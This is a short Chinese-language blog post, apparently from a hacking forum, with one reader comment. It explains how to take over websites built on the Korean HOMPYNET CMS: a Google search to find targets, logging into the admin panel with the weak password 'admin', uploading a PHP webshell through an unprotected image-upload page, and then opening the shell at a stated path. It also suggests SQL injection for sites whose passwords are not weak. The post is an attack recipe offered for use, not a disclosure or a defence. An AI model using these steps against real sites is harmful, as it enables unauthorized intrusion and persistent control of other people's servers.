关于韩国HOMPYNET CMS的漏洞···

其实这个洞我在11年就发现了,只是懒得发出来,现在既然有人发了,那我就发发当时我的拿shell方法

谷歌 inurl:program/lib/file_upload/file_upload.php
然后在网站后面加admin(EG: HTTP://www.xxx.xx/admin )
然后弱口令“admin”
登陆成功后在网站后面加“admin/image_flash.php?iname=logo_img&iform=form_site_g_setting”(EG: HTTP://www.xxx.xx/admin/image_flash.php?iname=logo_img&iform=form_site_g_setting)
然后直接上传PHPShell
最后在“http://www.xxx.xx/”后加“flash/images/”再加你的phpshell文件名(EG:http://www.xxx.xx/flash/images/123.php)

 

这套系统有很多二次开发,所以有很多注入,密码不是弱口令(当时89%的都是弱口令)的可以试试注入·

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录

  • 1 Responses to “关于韩国HOMPYNET CMS的漏洞···”
    • .....

      .....楼主11年的聊天记录还保存着!!!!